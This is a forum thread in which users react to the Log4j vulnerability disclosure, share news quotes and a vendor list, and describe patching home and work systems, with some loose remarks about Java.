Just Google Log4j. There's no end to the articles already, and it will just continue.

Cliff Notes: Many/Most/All(?) software vendors use bits of old code when they build new code. Some use a lot. Many use open source (unlicensed and free to use) software called Java under the hood of their commercial software. A new vulnerability allows remote bad actors to take over any system with this flaw with trivial ease. This vulnerability is thought to be present in HUNDREDS OF MILLIONS of systems world-wide.

Software re-use. They built castles on a free foundation, which we now learn is terribly flawed. It’s used in damn near everything. From global top tier software, to refrigerators. And this (ubiquitous use of Java) was NOT unknown. We’ve been talking about this for years. The industry I mean, not just me or my team.

It was in my home Ubiquiti router. I had to do an upgrade yesterday. And I'm still not sure someone didn't plant something for future access. We're patching multiple internal systems at work. Luckily none exposed to the Internet.

-- Some quotes from articles this morning:

“If you have an internet-facing server vulnerable to Log4Shell that you haven't patched yet, you almost certainly have an incident response on your hands,” says incident responder and former NSA hacker Jake Williams. “Threat actors were quick to operationalize this vulnerability."

“In a best-case scenario, major brokerages, banks, and merchants will invest huge sums in overtime costs to pay large numbers of already overworked IT employees to mop up this mess during the holidays. You don’t want to think about the worst-case scenario.”

Oh joy.

Thanks for the heads up.

Watch out for kid's software on you home computers/hardware. A lot of games use this stuff. Minecraft for example. If they log into web services with any Java based games, it's a big risk until this is patched up. Including the game, on your hardware.

It's under the covers on damn near everything. This is gonna leave a mark I'm afraid.

Yeah, I think we have known this since Al Gore invented the internet. The more of your personal data that you put out there, the more vulnerable you become. Buyer beware.

For the non-technical, a picture is worth 1000 words

Source article link?? Thank you…

Here is a breakdown. https://www.zdnet.com/article/...to-protect-yourself/

"A flaw in Log4j, a Java library for logging error messages in applications, is the most high-profile security vulnerability on the internet right now and comes with a severity score of 10 out of 10. The library is developed by the open-source Apache Software Foundation and is a key Java-logging framework."

FWIW, logging errors in applications is critical. Apache is widely deployed so log4J is out there.

The question for all CEO's: Can your CIO/CSO provide a detailed inventory of applications that use the vulnerable versions of log4j? Now, can that inventory be provided within an hour of your request? If not, your DevOps program is out of control and you are vulnerable.

I worked over 40 years in IT Infrastructure. My last two years involved many conversations with "DevOps" folks on the need for version control, change control and security measures. My take? There are some organizations that will be hit hard because they didn't implement a secure DevOps program.

It's not TEOTWAWKI but it will be career ending for some CIO/CSO. Any CIO/CSO that cannot produce that inventory within 1 hour of request has failed and should be called to task.

Glad I have an older refrigerator.

Yep. Dealing with this at work.

As long as it doesn't crash my wood stove or well pump I'll be alright.

Oh noes! A security flaw with Java?! Say it ain't so!

When hasn't there been an issue with Java?

quote:

Originally posted by Orguss:
Oh noes! A security flaw with Java?! Say it ain't so!

When hasn't there been an issue with Java?

Seriously.

I know nothing about this, but I just want to ask, is Apple more secure, more resistant, whatever, to this stuff? Seems like I never hear about Apple getting virus or malware????

Thanks
.

quote:

Originally posted by r0gue:
It was in my home Ubiquiti router.

In the router, or in the Ubiquiti UniFi Network framework? Near as I've been able to tell, only in the latter. E.g.: My Ubiquiti ERL is not vulnerable.

quote:

Originally posted by SPWAMike0317:
"A flaw in Log4j, a Java library for logging error messages in applications, is the most high-profile security vulnerability on the internet right now and comes with a severity score of 10 out of 10. The library is developed by the open-source Apache Software Foundation and is a key Java-logging framework."

FWIW, logging errors in applications is critical. Apache is widely deployed so log4J is out there.

Yes, Apache is widely-deployed, but, as noted in the cited article, log4j will be present only if there's a Java framework.

I've Apache deployed on three Internet-facing servers. None have any Java frameworks installed. Thus none are vulnerable.

For anybody interested: Here's a list of known vulnerable and known not vulnerable products and applications: Log4j overview related software

None of my Internet-facing devices or services are vulnerable. If I have any IoT devices vulnerable I'm not overly-concerned, as I don't allow arbitrary connections from the Internet to devices on my internal LAN.

quote:

Originally posted by ensigmatic:
For anybody interested: Here's a list of known vulnerable and known not vulnerable products and applications: Log4j overview related software

Oh, joy. Our entire state's court record database system is built around one of the vulnerable applications.

I'm sure the state IT guys are running around with their hair on fire right now.

quote:

Originally posted by RogueJSK:

quote:

Originally posted by ensigmatic:
For anybody interested: Here's a list of known vulnerable and known not vulnerable products and applications: Log4j overview related software

Oh, joy. Our entire state's court record database system is built around one of the vulnerable applications.

I'm sure the state IT guys are running around with their hair on fire right now.

The Virginia legislative system has been down since Monday..
https://wset.com/news/local/vi...re-ransomware-attack

One of our vendors reported they were down on Monday as well - luckily we don't use them for this, but they have a lot of companies that do use them for HR and Payroll...All down and their best estimate is several weeks. Imagine your timeclock, HR and payroll being down from now thru the end of the year

https://www.usatoday.com/story...ack-2021/6501274001/

quote:

Originally posted by RogueJSK:

quote:

Originally posted by ensigmatic:
For anybody interested: Here's a list of known vulnerable and known not vulnerable products and applications: Log4j overview related software

Oh, joy. Our entire state's court record database system is built around one of the vulnerable applications.

I'm sure the state IT guys are running around with their hair on fire right now.

Likely, the state does not run its own servers or networks. It’ll all be farmed out to the lowest bidder vendors. IBM, VMWARE, Oracle, F5, etc. etc. Moreover, it’ll be a combination of all of these vendors, not just one overall. It’ll be a CRITSIT shitshow for sure.

The saving grace is that the hackers are not probably very interested in court records but the more high value targets like Vangaurd, Fidelity, banks.

Makes me wonder how much of the bitcoin stuff has this vulnerability baked into it. Stay tuned I suppose.

quote:

Originally posted by Orguss:
Oh noes! A security flaw with Java?! Say it ain't so!

When hasn't there been an issue with Java?

Yeah. It needs to be scrapped. If it’s needed with no alternative, it needs to be run on a VM that’s locked down with no external access.

You're hating it if you work for Cisco. Those folks must be in full on crisis mode.

I don't see Apple, MSFT other than Azure, and Synology on the list. I should be GTG. I'm not running any Dockers at the moment, so no worries there.

Checked the list.

sigmonkey 1.0 retired not vulnerable